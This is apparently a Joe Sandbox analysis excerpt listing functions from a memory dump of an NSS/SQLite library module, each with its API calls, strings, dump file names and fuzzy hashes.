Opcode Fuzzy Hash: d95f581fa1554aea67b5c8dbba9898984c36fd2f65029e6d1f40016cb0fb39eb
Instruction Fuzzy Hash: 9F917875E00218AFDF00EF69D894AAABBB4FF09318F145169EC05B7711EB30E984CB95

Function 6C4FECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4FED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4FEE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4FEF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C4FEF98

Strings

database corruption, xrefs: 6C4FF48D
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4FF483
%s at line %d of [%.10s], xrefs: 6C4FF492

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: 9d7c418f3357d2ab7b6415e758fdd1b2a53e5dfda57f81515ed05c322cc980dc
Instruction ID: 35b02481ad6a8188fe9017ba5eb589d55e86ac7d6835e291d527fac96e54396c
Opcode Fuzzy Hash: 9d7c418f3357d2ab7b6415e758fdd1b2a53e5dfda57f81515ed05c322cc980dc
Instruction Fuzzy Hash: 91620030A062458FEB04CF65C480F9ABBF1BF85319F184198D8656BB92D775EC87CBA1

Function 6C59FC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON

Download Yara Rule

APIs

PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6C59FD06

Part of subcall function 6C59F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6C59F696
Part of subcall function 6C59F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6C59F789
Part of subcall function 6C59F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6C59F796
Part of subcall function 6C59F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6C59F79F
Part of subcall function 6C59F670: SECITEM_DupItem_Util.NSS3 ref: 6C59F7F0

Part of subcall function 6C5C3440: PK11_GetAllTokens.NSS3 ref: 6C5C3481
Part of subcall function 6C5C3440: PR_SetError.NSS3(00000000,00000000), ref: 6C5C34A3
Part of subcall function 6C5C3440: TlsGetValue.KERNEL32 ref: 6C5C352E
Part of subcall function 6C5C3440: EnterCriticalSection.KERNEL32(?), ref: 6C5C3542
Part of subcall function 6C5C3440: PR_Unlock.NSS3(?), ref: 6C5C355B

SECITEM_DupItem_Util.NSS3(?), ref: 6C59FDAD

Part of subcall function 6C5CFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C579003,?), ref: 6C5CFD91
Part of subcall function 6C5CFD80: PORT_Alloc_Util.NSS3(A4686C5D,?), ref: 6C5CFDA2
Part of subcall function 6C5CFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C5D,?,?), ref: 6C5CFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C59FE00

Part of subcall function 6C5CFD80: free.MOZGLUE(00000000,?,?), ref: 6C5CFDD1

Part of subcall function 6C5BE550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5BE5A0

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C59FEBB
PK11_FreeSymKey.NSS3(00000000), ref: 6C59FEC8
PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6C59FED3
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C59FF0C
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C59FF23
PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6C59FF4D
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C59FFDA
PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6C5A0007
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C5A0029
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C5A0044

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
String ID:
API String ID: 138705723-0
Opcode ID: 0d6a476e6968adb1e023aa0fb6c7278d6a027973a26128241374bb3855fe683f
Instruction ID: 78cc01edd4f3bb957e159d0210162125ad359bc89537125dc91265c360f1380b
Opcode Fuzzy Hash: 0d6a476e6968adb1e023aa0fb6c7278d6a027973a26128241374bb3855fe683f
Instruction Fuzzy Hash: ADB1C471604341AFE704CF29CC80A6AB7E5FF88308F548B6DF99A97A41E770E944CB91

Function 6C597D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6C597DDC

Part of subcall function 6C5D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C578298,?,?,?,6C56FCE5,?), ref: 6C5D07BF
Part of subcall function 6C5D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C5D07E6
Part of subcall function 6C5D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5D081B
Part of subcall function 6C5D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5D0825

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C597DF3
PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C597F07
PK11_GetPadMechanism.NSS3(00000000), ref: 6C597F57
PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C597F98
PK11_FreeSymKey.NSS3(?), ref: 6C597FC9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C597FDE
PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C598000

Part of subcall function 6C5B9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C597F0C,?,00000000,00000000,00000000,?), ref: 6C5B943B
Part of subcall function 6C5B9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C5B946B
Part of subcall function 6C5B9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C5B9546

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C598110
PK11_FreeSymKey.NSS3(00000000), ref: 6C59811D
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C59822D
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C59823C

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
String ID:
API String ID: 1923011919-0
Opcode ID: fa4544d093a643203d061a05a1efd4fe478230224f714b00d5b42a8423fef621
Instruction ID: 9599ad2459a8da52041873e9eb33ab3ea550a097c4c26635a96698723adca98d
Opcode Fuzzy Hash: fa4544d093a643203d061a05a1efd4fe478230224f714b00d5b42a8423fef621
Instruction Fuzzy Hash: D3C16FB1D00259DBEB21CF24CC40BEAB7B8EF05348F0085E6E919A6641E7719E85CF91

Function 6C50AEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C62CF46,?,6C4FCDBD,?,6C62BF31,?,?,?,?,?,?,?), ref: 6C50B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C62CF46,?,6C4FCDBD,?,6C62BF31), ref: 6C50B090
sqlite3_free.NSS3(?,?,?,?,?,?,6C62CF46,?,6C4FCDBD,?,6C62BF31), ref: 6C50B0A2
CloseHandle.KERNEL32(?,?,6C62CF46,?,6C4FCDBD,?,6C62BF31,?,?,?,?,?,?,?,?,?), ref: 6C50B100
sqlite3_free.NSS3(?,?,00000002,?,6C62CF46,?,6C4FCDBD,?,6C62BF31,?,?,?,?,?,?,?), ref: 6C50B115
sqlite3_free.NSS3(?,?,?,?,?,?,6C62CF46,?,6C4FCDBD,?,6C62BF31), ref: 6C50B12D

Part of subcall function 6C4F9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C50C6FD,?,?,?,?,6C55F965,00000000), ref: 6C4F9F0E
Part of subcall function 6C4F9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C55F965,00000000), ref: 6C4F9F5D

Strings

`hl, xrefs: 6C50B0DF

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID: `hl
API String ID: 3155957115-1912930724
Opcode ID: c60225ea5a8a0c33d27165970980faf6b8613e51f02c5d43c089985ff5c130c9
Instruction ID: c36dacfceafd3720d25395fb5b26bc70a0f12336ec07d06be8c2472016a527f5
Opcode Fuzzy Hash: c60225ea5a8a0c33d27165970980faf6b8613e51f02c5d43c089985ff5c130c9
Instruction Fuzzy Hash: B691BCB0B042068FEB04DF26CCC5A6AB7B1FF45308F144A2DE416D7A50EB31E951CB95

Function 6C5A0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C5A0F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C5A0FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C5A1006
PK11_FreeSymKey.NSS3(?), ref: 6C5A101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5A1033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5A103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C5A1048
memcpy.VCRUNTIME140(?,?,?), ref: 6C5A108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C5A10BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C5A10D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C5A112E

Part of subcall function 6C5A1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C5A08C4,?,?), ref: 6C5A15B8
Part of subcall function 6C5A1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C5A08C4,?,?), ref: 6C5A15C1
Part of subcall function 6C5A1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A162E
Part of subcall function 6C5A1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A1637

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: bfacf471c0052b08b2b078d441c4ca1dee4cff53f358eb0f9a9416bc40f4aeef
Instruction ID: c0cdc62b581f1f63c1a842c149deb26c92bb20c8b08a845f6d9937867a46763a
Opcode Fuzzy Hash: bfacf471c0052b08b2b078d441c4ca1dee4cff53f358eb0f9a9416bc40f4aeef
Instruction Fuzzy Hash: FD71ACB5A00205CBDB00CFA6CC84A6FB7F5BF88318F14862DE91997711E771D946CB91

Function 6C5C1CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000020), ref: 6C5C1F19
memcpy.VCRUNTIME140(?,?,00000020), ref: 6C5C2166
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C5C228F
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C5C23B8
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5C241C

Strings

manufacturer, xrefs: 6C5C2179
serial, xrefs: 6C5C22A2
token, xrefs: 6C5C1F2C
model, xrefs: 6C5C23CB, 6C5C23EC

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: memcpy$Error
String ID: manufacturer$model$serial$token
API String ID: 3204416626-1906384322
Opcode ID: a86b68d5bf35a8ded84a164c5ee9fbb9b5ccef308cc6b97acd4fc38b4e6d977b
Instruction ID: 6be50a14f9b3fe966fa9b56c590fa4386dbae951c439d2d2a5461df71289d692
Opcode Fuzzy Hash: a86b68d5bf35a8ded84a164c5ee9fbb9b5ccef308cc6b97acd4fc38b4e6d977b
Instruction Fuzzy Hash: 39022EB2F0C7C86EF73186B1CC4C3D76AE09B45328F18666EC5DE46683C7A859498753

Function 6C500FE0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6C4FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C55F9C9,?,6C55F4DA,6C55F9C9,?,?,6C52369A), ref: 6C4FCA7A
Part of subcall function 6C4FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C4FCB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C50103E
EnterCriticalSection.KERNEL32(?), ref: 6C501139
LeaveCriticalSection.KERNEL32(?), ref: 6C501190
sqlite3_free.NSS3(00000000), ref: 6C501227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C50126E
sqlite3_free.NSS3(?), ref: 6C50127F

Strings

Phl, xrefs: 6C50109E
delayed %dms for lock/sharing conflict at line %d, xrefs: 6C501267
winAccess, xrefs: 6C50129B

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: Phl$delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-912803945
Opcode ID: 91bfd14e8e3ae15e152efec7cf834e886c374066f114a25279b2712ecbb8b929
Instruction ID: bb8ef3d70b027a73ef42cdea358e9602531680032ccf1c730f0afb27547d61da
Opcode Fuzzy Hash: 91bfd14e8e3ae15e152efec7cf834e886c374066f114a25279b2712ecbb8b929
Instruction Fuzzy Hash: 8D71F8327052019BEB08DF67DCC5A6B33B5EB86328F144629E916C7A81DB70ED41C797

Function 6C5C6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C571C6F,00000000,00000004,?,?), ref: 6C5C6C3F

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C571C6F,00000000,00000004,?,?), ref: 6C5C6C60
PR_ExplodeTime.NSS3(00000000,6C571C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C571C6F,00000000,00000004,?,?), ref: 6C5C6C94

Strings

gfff, xrefs: 6C5C6D30
gfff, xrefs: 6C5C6D66
gfff, xrefs: 6C5C6D9C
gfff, xrefs: 6C5C6CF5
gfff, xrefs: 6C5C6CFD

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 0f33eb0af0a5ab8679a52c6d4a141c5330a1f6f105bdb03f4f542a5c216948fc
Instruction ID: d9153873b94aa315f723b65387e1d2a396c788177b7589b9422dc90b62f71a7f
Opcode Fuzzy Hash: 0f33eb0af0a5ab8679a52c6d4a141c5330a1f6f105bdb03f4f542a5c216948fc
Instruction Fuzzy Hash: 70513C72B016494FC708CDADDC526EEB7DA9BE4310F48C23AE442DB781DA38D906C752

Function 6C640F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C641027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6410B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C641353

Strings

NULL, xrefs: 6C64119E
zeroblob(%d), xrefs: 6C641223
%02x, xrefs: 6C6412F6
-- , xrefs: 6C640FF5
%lld, xrefs: 6C64114B
'%.*q', xrefs: 6C641217, 6C641292
$, xrefs: 6C6412A0

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: 43049b4348efe408a34496073b8286d692f06208f30efe1c2422d44ded40fda8
Instruction ID: 81a7df8a0784b01050160b5592b620b5f9799964e8ca7a9327f6f202cff76694
Opcode Fuzzy Hash: 43049b4348efe408a34496073b8286d692f06208f30efe1c2422d44ded40fda8
Instruction Fuzzy Hash: 27E19D71A08380DFD715CF14C880AABBBF1AF86348F14C92DE99587B51E771E859CB86

Function 6C5DBD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C5DBD48
NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C5DBD68
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C5DBD83
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C5DBD9E
NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C5DBDB9
NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C5DBDD0
NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C5DBDEA
NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C5DBE04
NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C5DBE1E

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: AlgorithmPolicy
String ID:
API String ID: 2721248240-0
Opcode ID: bea7e1e8fabf5646ac30ce796f6df9dad257114b84c6698300ed2f507b42e6b5
Instruction ID: 23c859065518b80af820b37c313806b99b993efde1d2fbab159006a0bf25172c
Opcode Fuzzy Hash: bea7e1e8fabf5646ac30ce796f6df9dad257114b84c6698300ed2f507b42e6b5
Instruction Fuzzy Hash: EC218176E0439A96FB006B5F9C42B8F32759BD274EF0A0114E916AF741E710F81886AE

Function 6C688D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C6D14E4,6C63CC70), ref: 6C688D47
PR_GetCurrentThread.NSS3 ref: 6C688D98

Part of subcall function 6C560F00: PR_GetPageSize.NSS3(6C560936,FFFFE8AE,?,6C4F16B7,00000000,?,6C560936,00000000,?,6C4F204A), ref: 6C560F1B
Part of subcall function 6C560F00: PR_NewLogModule.NSS3(clock,6C560936,FFFFE8AE,?,6C4F16B7,00000000,?,6C560936,00000000,?,6C4F204A), ref: 6C560F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C688E7B
htons.WSOCK32(?), ref: 6C688EDB
PR_GetCurrentThread.NSS3 ref: 6C688F99
PR_GetCurrentThread.NSS3 ref: 6C68910A

Strings

%u.%u.%u.%u, xrefs: 6C688E74

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: e54447ce26d029fbd291d00f64f8d67a311d24e070425864c2e1608b037e1457
Instruction ID: 0f3a4c20d80ad66d9f63a7da3e9441e336d445fff5fbce1e375870cca8442470
Opcode Fuzzy Hash: e54447ce26d029fbd291d00f64f8d67a311d24e070425864c2e1608b037e1457
Instruction Fuzzy Hash: 37029A3190B2518FDB14CF19C4687AABBB2EF8630CF19825ED8925FAA1C731D945C7B4

Function 6C648FB0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6490DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C649118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C64915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6491C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C649209

Strings

UUUU, xrefs: 6C649255
3333, xrefs: 6C64925E

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

